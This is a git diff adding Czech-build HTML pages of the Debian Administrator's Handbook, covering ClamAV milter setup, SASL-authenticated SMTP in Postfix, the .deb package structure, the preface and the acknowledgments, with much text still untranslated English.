+                class="pkg pkg">unzoo</span>, <span
+                class="pkg pkg">unrar</span> and <span
+                class="pkg pkg">lha</span>, since they are required for the antivirus to analyze attachments archived in one of these formats.
+			</div><a
+              id="id-1.14.4.12.5"
+              class="indexterm"></a><a
+              id="id-1.14.4.12.6"
+              class="indexterm"></a><div
+              class="para">
+				The task of interfacing between antivirus and the email server goes to <code
+                class="command">clamav-milter</code>. A <span
+                class="emphasis"><em>milter</em></span> (short for <span
+                class="emphasis"><em>mail filter</em></span>) is a filtering program specially designed to interface with email servers. A milter uses a standard application programming interface (API) that provides much better performance than filters external to the email servers. Milters were initially introduced by <span
+                class="emphasis"><em>Sendmail</em></span>, but <span
+                class="emphasis"><em>Postfix</em></span> soon followed suit.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>QUICK LOOK</em></span> A milter for Spamassassin</strong></p></div></div></div><a
+                id="id-1.14.4.12.8.2"
+                class="indexterm"></a><div
+                class="para">
+				The <span
+                  class="pkg pkg">spamass-milter</span> package provides a milter based on <span
+                  class="emphasis"><em>SpamAssassin</em></span>, the famous unsolicited email detector. It can be used to flag messages as probable spams (by adding an extra header) and/or to reject the messages altogether if their “spamminess” score goes beyond a given threshold.
+			</div></div><div
+              class="para">
+				Once the <span
+                class="pkg pkg">clamav-milter</span> package is installed, the milter should be reconfigured to run on a TCP port rather than on the default named socket. This can be achieved with <code
+                class="command">dpkg-reconfigure clamav-milter</code>. When prompted for the “Communication interface with Sendmail”, answer “<code
+                class="literal">inet:10002@127.0.0.1</code>”.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>NOTE</em></span> Real TCP port vs named socket</strong></p></div></div></div><div
+                class="para">
+				The reason why we use a real TCP port rather than the named socket is that the postfix daemons often run chrooted and do not have access to the directory hosting the named socket. You could also decide to keep using a named socket and pick a location within the chroot (<code
+                  class="filename">/var/spool/postfix/</code>).
+			</div></div><div
+              class="para">
+				The standard ClamAV configuration fits most situations, but some important parameters can still be customized with <code
+                class="command">dpkg-reconfigure clamav-base</code>.
+			</div><div
+              class="para">
+				The last step involves telling Postfix to use the recently-configured filter. This is a simple matter of adding the following directive to <code
+                class="filename">/etc/postfix/main.cf</code>:
+			</div><pre
+              class="programlisting">
+# Virus check with clamav-milter
+smtpd_milters = inet:[127.0.0.1]:10002
+</pre><div
+              class="para">
+				If the antivirus causes problems, this line can be commented out, and <code
+                class="command">service postfix reload</code> should be run so that this change is taken into account.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>IN PRACTICE</em></span> Testing the antivirus</strong></p></div></div></div><div
+                class="para">
+				Once the antivirus is set up, its correct behavior should be tested. The simplest way to do that is to send a test email with an attachment containing the <code
+                  class="filename">eicar.com</code> (or <code
+                  class="filename">eicar.com.zip</code>) file, which can be downloaded online: <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://www.eicar.org/86-0-Intended-use.html">http://www.eicar.org/86-0-Intended-use.html</a></div>
+			</div><div
+                class="para">
+				This file is not a true virus, but a test file that all antivirus software on the market diagnose as a virus to allow checking installations.
+			</div></div><div
+              class="para">
+				All messages handled by Postfix now go through the antivirus filter.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.authenticated-smtp"></a>11.1.7. Authenticated SMTP</h3></div></div></div><div
+              class="para">
+				Being able to send emails requires an SMTP server to be reachable; it also requires said SMTP server to send emails through it. For roaming users, this may need regularly changing the configuration of the SMTP client, since Falcot's SMTP server rejects messages coming from IP addresses apparently not belonging to the company. Two solutions exist: either the roaming user installs an SMTP server on their computer, or they still use the company server with some means of authenticating as an employee. The former solution is not recommended since the computer won't be permanently connected, and it won't be able to retry sending messages in case of problems; we will focus on the latter solution.
+			</div><div
+              class="para">
+				SMTP authentication in Postfix relies on SASL (<span
+                class="emphasis"><em>Simple Authentication and Security Layer</em></span>). It requires installing the <span
+                class="pkg pkg">libsasl2-modules</span> and <span
+                class="pkg pkg">sasl2-bin</span> packages, then registering a password in the SASL database for each user that needs authenticating on the SMTP server. This is done with the <code
+                class="command">saslpasswd2</code> command, which takes several parameters. The <code
+                class="literal">-u</code> option defines the authentication domain, which must match the <code
+                class="literal">smtpd_sasl_local_domain</code> parameter in the Postfix configuration. The <code
+                class="literal">-c</code> option allows creating a user, and <code
+                class="literal">-f</code> allows specifying the file to use if the SASL database needs to be stored at a different location than the default (<code
+                class="filename">/etc/sasldb2</code>).
+			</div><pre
+              class="screen scale">
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>saslpasswd2 -u `postconf -h myhostname` -f /var/spool/postfix/etc/sasldb2 -c jean</code></strong>
+<code
+                class="computeroutput">[... type jean's password twice ...]</code></pre><div
+              class="para">
+				Note that the SASL database was created in Postfix's directory. In order to ensure consistency, we also turn <code
+                class="filename">/etc/sasldb2</code> into a symbolic link pointing at the database used by Postfix, with the <code
+                class="command">ln -sf /var/spool/postfix/etc/sasldb2 /etc/sasldb2</code> command.
+			</div><div
+              class="para">
+				Now we need to configure Postfix to use SASL. First the <code
+                class="literal">postfix</code> user needs to be added to the <code
+                class="literal">sasl</code> group, so that it can access the SASL account database. A few new parameters are also needed to enable SASL, and the <code
+                class="literal">smtpd_recipient_restrictions</code> parameter needs to be configured to allow SASL-authenticated clients to send emails freely.
+			</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.14.4.13.7"></a><p
+                class="title"><strong>Příklad 11.15. Enabling SASL in <code
+                    class="filename">/etc/postfix/main.cf</code></strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# Enable SASL authentication
+smtpd_sasl_auth_enable = yes
+# Define the SASL authentication domain to use
+smtpd_sasl_local_domain = $myhostname
+[...]
+# Adding permit_sasl_authenticated before reject_unauth_destination
+# allows relaying mail sent by SASL-authenticated users
+smtpd_recipient_restrictions = permit_mynetworks,
+    permit_sasl_authenticated,
+    reject_unauth_destination,
+[...]
+</pre></div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>EXTRA</em></span> Authenticated SMTP client</strong></p></div></div></div><div
+                class="para">
+				Most email clients are able to authenticate to an SMTP server before sending outgoing messages, and using that feature is a simple matter of configuring the appropriate parameters. If the client in use does not provide that feature, the workaround is to use a local Postfix server and configure it to relay email via the remote SMTP server. In this case, the local Postfix itself will be the client that authenticates with SASL. Here are the required parameters:
+			</div><pre
+                class="programlisting">
+smtp_sasl_auth_enable = yes
+smtp_sasl_password_maps = hash:/etc/postfix/sasl_passwd
+relay_host = [mail.falcot.com]
+</pre><div
+                class="para">
+				The <code
+                  class="filename">/etc/postfix/sasl_passwd</code> file needs to contain the username and password to use for authenticating on the <code
+                  class="literal">mail.falcot.com</code> server. Here is an example:
+			</div><pre
+                class="programlisting">
+[mail.falcot.com]   joe:LyinIsji
+</pre><div
+                class="para">
+				As for all Postfix maps, this file must be turned into <code
+                  class="filename">/etc/postfix/sasl_passwd.db</code> with the <code
+                  class="command">postmap</code> command.
+			</div></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.network-diagnosis-tools.html"><strong>Předcházející</strong>10.8. Network Diagnosis Tools</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.http-web-server.html"><strong>Další</strong>11.2. Web Server (HTTP)</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/packaging-system.html b/tmp/cs-CZ/html/packaging-system.html
new file mode 100644
index 000000000..e4aa06fd7
--- /dev/null
+++ b/tmp/cs-CZ/html/packaging-system.html
@@ -0,0 +1,318 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 5. Packaging System: Tools and Fundamental Principles</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Binary package, Source package, dpkg, dependencies, conflict" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.after-first-boot.html"
+        title="4.3. After the First Boot" /><link
+        rel="next"
+        href="sect.package-meta-information.html"
+        title="5.2. Package Meta-Information" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/packaging-system.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.after-first-boot.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.package-meta-information.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="packaging-system"></a>Kapitola 5. Packaging System: Tools and Fundamental Principles</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="packaging-system.html#sect.binary-package-structure">5.1. Structure of a Binary Package</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.package-meta-information.html">5.2. Package Meta-Information</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.package-meta-information.html#sect.control">5.2.1. Description: the <code
+                        class="filename">control</code> File</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.package-meta-information.html#sect.configuration-scripts">5.2.2. Configuration Scripts</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.package-meta-information.html#sect.conffiles">5.2.3. Checksums, List of Configuration Files</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.source-package-structure.html">5.3. Structure of a Source Package</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.source-package-structure.html#id-1.8.7.4">5.3.1. Format</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.source-package-structure.html#id-1.8.7.5">5.3.2. Usage within Debian</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.manipulating-packages-with-dpkg.html">5.4. Manipulating Packages with <code
+                    class="command">dpkg</code></a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.manipulating-packages-with-dpkg.html#id-1.8.8.5">5.4.1. Installing Packages</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.manipulating-packages-with-dpkg.html#id-1.8.8.6">5.4.2. Package Removal</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.manipulating-packages-with-dpkg.html#id-1.8.8.7">5.4.3. Querying <code
+                        class="command">dpkg</code>'s Database and Inspecting <code
+                        class="filename">.deb</code> Files</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.manipulating-packages-with-dpkg.html#id-1.8.8.8">5.4.4. <code
+                        class="command">dpkg</code>'s Log File</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.manipulating-packages-with-dpkg.html#sect.multi-arch">5.4.5. Multi-Arch Support</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.coexistence-with-other-packaging-systems.html">5.5. Coexistence with Other Packaging Systems</a></span></dt></dl></div><div
+          class="highlights"><div
+            class="para">
+		As a Debian system administrator, you will routinely handle <code
+              class="filename">.deb</code> packages, since they contain consistent functional units (applications, documentation, etc.), whose installation and maintenance they facilitate. It is therefore a good idea to know what they are and how to use them.
+	</div></div><div
+          class="para">
+		This chapter describes the structure and contents of “binary” and “source” packages. The former are <code
+            class="filename">.deb</code> files, directly usable by <code
+            class="command">dpkg</code>, while the latter contain the source code, as well as instructions for building binary packages.
+	</div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.binary-package-structure"></a>5.1. Structure of a Binary Package</h2></div></div></div><a
+            id="id-1.8.5.2"
+            class="indexterm"></a><a
+            id="id-1.8.5.3"
+            class="indexterm"></a><div
+            class="para">
+			The Debian package format is designed so that its content may be extracted on any Unix system that has the classic commands <code
+              class="command">ar</code>, <code
+              class="command">tar</code>, and <code
+              class="command">xz</code> (sometimes <code
+              class="command">gzip</code> or <code
+              class="command">bzip2</code>). This seemingly trivial property is important for portability and disaster recovery.
+		</div><div
+            class="para">
+			Imagine, for example, that you mistakenly deleted the <code
+              class="command">dpkg</code> program, and that you could thus no longer install Debian packages. <code
+              class="command">dpkg</code> being a Debian package itself, it would seem your system would be done for... Fortunately, you know the format of a package and can therefore download the <code
+              class="filename">.deb</code> file of the <span
+              class="pkg pkg">dpkg</span> package and install it manually (see sidebar <a
+              class="xref"
+              href="packaging-system.html#sidebar.dpkg-apt-ar"><span
+                class="emphasis"><em>TOOLS</em></span> <code
+                class="command">dpkg</code>, <code
+                class="command">APT</code> and <code
+                class="command">ar</code></a>). If by some misfortune one or more of the programs <code
+              class="command">ar</code>, <code
+              class="command">tar</code> or <code
+              class="command">gzip</code>/<code
+              class="command">xz</code>/<code
+              class="command">bzip2</code> have disappeared, you will only need to copy the missing program from another system (since each of these operates in a completely autonomous manner, without dependencies, a simple copy will suffice). If your system suffered some even more outrageous fortune, and even these don't work (maybe the deepest system libraries are missing?), you should try the static version of <code
+              class="command">busybox</code> (provided in the <span
+              class="pkg pkg">busybox-static</span> package), which is even more self-contained, and provides subcommands such as <code
+              class="command">busybox ar</code>, <code
+              class="command">busybox tar</code> and <code
+              class="command">busybox xz</code>.
+		</div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.dpkg-apt-ar"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TOOLS</em></span> <code
+                        class="command">dpkg</code>, <code
+                        class="command">APT</code> and <code
+                        class="command">ar</code></strong></p></div></div></div><a
+              id="id-1.8.5.6.2"
+              class="indexterm"></a><a
+              id="id-1.8.5.6.3"
+              class="indexterm"></a><a
+              id="id-1.8.5.6.4"
+              class="indexterm"></a><div
+              class="para">
+			<code
+                class="command">dpkg</code> is the program that handles <code
+                class="filename">.deb</code> files, notably extracting, analyzing, and unpacking them.
+		</div><div
+              class="para">
+			<code
+                class="command">APT</code> is a group of programs that allows the execution of higher-level modifications to the system: installing or removing a package (while keeping dependencies satisfied), updating the system, listing the available packages, etc.
+		</div><a
+              id="id-1.8.5.6.7"
+              class="indexterm"></a><div
+              class="para">
+			As for the <code
+                class="command">ar</code> program, it allows handling files of the same name: <code
+                class="command">ar t <em
+                  class="replaceable">archive</em></code> displays the list of files contained in such an archive, <code
+                class="command">ar x <em
+                  class="replaceable">archive</em></code> extracts the files from the archive into the current working directory, <code
+                class="command">ar d <em
+                  class="replaceable">archive</em> <em
+                  class="replaceable">file</em></code> deletes a file from the archive, etc. Its man page (<span
+                class="citerefentry"><span
+                  class="refentrytitle">ar</span>(1)</span>) documents all its other features. <code
+                class="command">ar</code> is a very rudimentary tool that a Unix administrator would only use on rare occasions, but admins routinely use <code
+                class="command">tar</code>, a more evolved archive and file management program. This is why it is easy to restore <code
+                class="command">dpkg</code> in the event of an erroneous deletion. You would only have to download the Debian package and extract the content from the <code
+                class="filename">data.tar.xz</code> archive in the system's root (<code
+                class="filename">/</code>):
+		</div><pre
+              class="screen">
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>ar x dpkg_1.18.24_amd64.deb</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>tar -C / -p -xJf data.tar.xz</code></strong></pre></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Man page notation</strong></p></div></div></div><div
+              class="para">
+			It can be confusing for beginners to find references to “<span
+                class="citerefentry"><span
+                  class="refentrytitle">ar</span>(1)</span>” in the literature. This is generally a convenient means of referring to the man page entitled <code
+                class="literal">ar</code> in section 1.
+		</div><div
+              class="para">
+			Sometimes this notation is also used to remove ambiguities, for example to distinguish between the <code
+                class="command">printf</code> command that can also be indicated by <span
+                class="citerefentry"><span
+                  class="refentrytitle">printf</span>(1)</span> and the <code
+                class="function">printf</code> function in the C programming language, which can also be referred to as <span
+                class="citerefentry"><span
+                  class="refentrytitle">printf</span>(3)</span>.
+		</div><div
+              class="para">
+			<a
+                class="xref"
+                href="solving-problems.html">7 – „<em>Solving Problems and Finding Relevant Information</em>“</a> discusses manual pages in further detail (see <a
+                class="xref"
+                href="solving-problems.html#sect.manual-pages">7.1.1 – „Manual Pages“</a>).
+		</div></div><div
+            class="para">
+			Have a look at the content of a <code
+              class="filename">.deb</code> file:
+		</div><pre
+            class="screen"><code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>ar t dpkg_1.18.24_amd64.deb</code></strong>
+<code
+              class="computeroutput">debian-binary
+control.tar.gz
+data.tar.xz
+$ </code><strong
+              class="userinput"><code>ar x dpkg_1.18.24_amd64.deb</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>ls</code></strong>
+<code
+              class="computeroutput">control.tar.gz  data.tar.xz  debian-binary  dpkg_1.18.24_amd64.deb
+$ </code><strong
+              class="userinput"><code>tar tJf data.tar.xz | head -n 15</code></strong>
+<code
+              class="computeroutput">./
+./etc/
+./etc/alternatives/
+./etc/alternatives/README
+./etc/cron.daily/
+./etc/cron.daily/dpkg
+./etc/dpkg/
+./etc/dpkg/dpkg.cfg
+./etc/dpkg/dpkg.cfg.d/
+./etc/logrotate.d/
+./etc/logrotate.d/dpkg
+./sbin/
+./sbin/start-stop-daemon
+./usr/
+./usr/bin/
+$ </code><strong
+              class="userinput"><code>tar tzf control.tar.gz</code></strong>
+<code
+              class="computeroutput">./
+./conffiles
+./postinst
+./md5sums
+./prerm
+./control
+./postrm
+$ </code><strong
+              class="userinput"><code>cat debian-binary</code></strong>
+<code
+              class="computeroutput">2.0</code></pre><div
+            class="para">
+			As you can see, the <code
+              class="command">ar</code> archive of a Debian package is comprised of three files:
+		</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+					<code
+                    class="filename">debian-binary</code>. This is a text file which simply indicates the version of the <code
+                    class="filename">.deb</code> file used (in 2017: version 2.0).
+				</div></li><li
+                class="listitem"><div
+                  class="para">
+					<code
+                    class="filename">control.tar.gz</code>. This archive file contains all of the available meta-information, like the name and version of the package. Some of this meta-information allows package management tools to determine if it is possible to install or uninstall it, for example according to the list of packages already on the machine.
+				</div></li><li
+                class="listitem"><div
+                  class="para">
+					<code
+                    class="filename">data.tar.xz</code>. This archive contains all of the files to be extracted from the package; this is where the executable files, documentation, etc., are all stored. Some packages may use other compression formats, in which case the file will be named differently (<code
+                    class="filename">data.tar.bz2</code> for bzip2, <code
+                    class="filename">data.tar.gz</code> for gzip).
+				</div></li></ul></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.after-first-boot.html"><strong>Předcházející</strong>4.3. After the First Boot</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.package-meta-information.html"><strong>Další</strong>5.2. Package Meta-Information</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/preface.html b/tmp/cs-CZ/html/preface.html
new file mode 100644
index 000000000..b9d779931
--- /dev/null
+++ b/tmp/cs-CZ/html/preface.html
@@ -0,0 +1,104 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Úvodní slovo</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="next"
+        href="foreword.html"
+        title="Předmluva" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/preface.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="index.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="foreword.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="preface"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="preface"></a>Úvodní slovo</h1></div></div></div><div
+          class="para">
+		Thank you for your interest in Debian. At the time of writing, more than 10% of the web is powered by Debian. Think about it; how many web sites would you have missed today without Debian?
+	</div><div
+          class="para">
+		Debian is the operating system of choice on the International Space Station, and countless universities, companies and public administrations rely on Debian to deliver services to millions of users around the world and beyond. Truly, Debian is a highly successful project and is far more pervasive in our lives than people are aware of.
+	</div><div
+          class="para">
+		But Debian is much more than “just” an operating system. First, Debian is a concrete vision of the freedoms that people should enjoy in a world increasingly dependent on computers. It is forged from the crucible of Free Software ideals where people should be in control of their devices and not the other way around. With enough knowledge you should be able to dismantle, modify, reassemble and share the software that matters to you. It doesn't matter if the software is used for frivolous or even life-threatening tasks, you should be in control of it.
+	</div><div
+          class="para">
+		Secondly, Debian is a very peculiar social experiment. Entirely volunteer-led, individual contributors take on all the responsibilities needed to keep Debian functioning rather than being delegated or assigned tasks by a company or organization. This means that Debian can be trusted to not be driven by the commercial interests or whims of companies that may not be aligned with the goal of promoting people's freedoms.
+	</div><div
+          class="para">
+		And the book you have in your hands is vastly different from other books; it is a <span
+            class="emphasis"><em>free as in freedom</em></span> book, a book that finally lives up to Debian's standards for every aspect of your digital life. You can <code
+            class="command">apt install</code> this book, you can redistribute it, you can “fork” it, and even submit bug reports and patches so that other readers may benefit from your feedback. The maintainers of this book — who are also its authors — are longstanding members of the Debian Project who truly understand the ethos that permeate every aspect of the project.
+	</div><div
+          class="para">
+		By writing and releasing this book, they are doing a truly wonderful service to the Debian community.
+	</div><div
+          class="para">
+		May 2017
+	</div><div
+          class="para">
+		Chris Lamb (Debian Project Leader)
+	</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="index.html"><strong>Předcházející</strong>The Debian Administrator's Handbook</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="foreword.html"><strong>Další</strong>Předmluva</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.acknowledgments.html b/tmp/cs-CZ/html/sect.acknowledgments.html
new file mode 100644
index 000000000..eddd0aa80
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.acknowledgments.html
@@ -0,0 +1,189 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">5. Poděkování</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="foreword.html"
+        title="Předmluva" /><link
+        rel="prev"
+        href="sect.book-structure.html"
+        title="4. truktura knihy" /><link
+        rel="next"
+        href="the-debian-project.html"
+        title="Kapitola 1. Projekt Debian" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.acknowledgments.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.book-structure.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="the-debian-project.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.acknowledgments"></a>5. Poděkování</h2></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.3.9.2"></a>5.1. Trocha historie</h3></div></div></div><div
+            class="para">
+				V roce 2003, kontaktoval Nat Makarévitch Raphaëla, protože chtěl zveřejnit knihu o Debianu v kolekci <span
+              class="foreignphrase"><em
+                class="foreignphrase">Cahier de l'Admin</em></span> (Příruček pro správce), kterou měl na starosti pro Eyrolles, předního francouzského vydavatele technických knih. Raphaël okamžitě souhlasil, že ji napíše. První vydání vyšlo 14.října 2004 a mělo obrovský úspěch - bylo vyprodáno sotva o čtyři měsíce později.
+			</div><div
+            class="para">
+				Since then, we have released 7 other editions of the French book, one for each subsequent Debian release. Roland, who started working on the book as a proofreader, gradually became its co-author.
+			</div><div
+            class="para">
+				I když jsme byli samozřejmě spokojeni s úspěchem knihy, vždy jsme doufali, že Eyrolles přesvědčí nějakého mezinárodního vydavatele, aby ji přeložil do angličtiny. Obdrželi jsme četné komentáře vysvětlující, jak kniha pomohla lidem s Debianem začít a byli jsme dychtiví, aby i ostatní měli z knihy stejný prospěch.
+			</div><div
+            class="para">
+				Alas, no English-speaking editor that we contacted was willing to take the risk of translating and publishing the book. Not put off by this small setback, we negotiated with our French editor Eyrolles and got back the necessary rights to translate the book into English and publish it ourselves. Thanks to a <a
+              href="http://www.ulule.com/debian-handbook/">successful crowdfunding campaign</a>, we worked on the translation between December 2011 and May 2012. The “Debian Administrator's Handbook” was born and it was published under a free-software license!
+			</div><div
+            class="para">
+				While this was an important milestone, we already knew that the story would not be over for us until we could contribute the French book as an official translation of the English book. This was not possible at that time because the French book was still distributed commercially under a non-free license by Eyrolles.
+			</div><div
+            class="para">
+				In 2013, the release of Debian 7 gave us a good opportunity to discuss a new contract with Eyrolles. We convinced them that a license more in line with the Debian values would contribute to the book's success. That wasn't an easy deal to make, and we agreed to setup another <a
+              href="http://www.ulule.com/liberation-cahier-admin-debian/">crowdfunding campaign</a> to cover some of the costs and reduce the risks involved. The operation was again a huge success and in July 2013, we added a French translation to the Debian Administrator's Handbook.
+			</div><div
+            class="para">
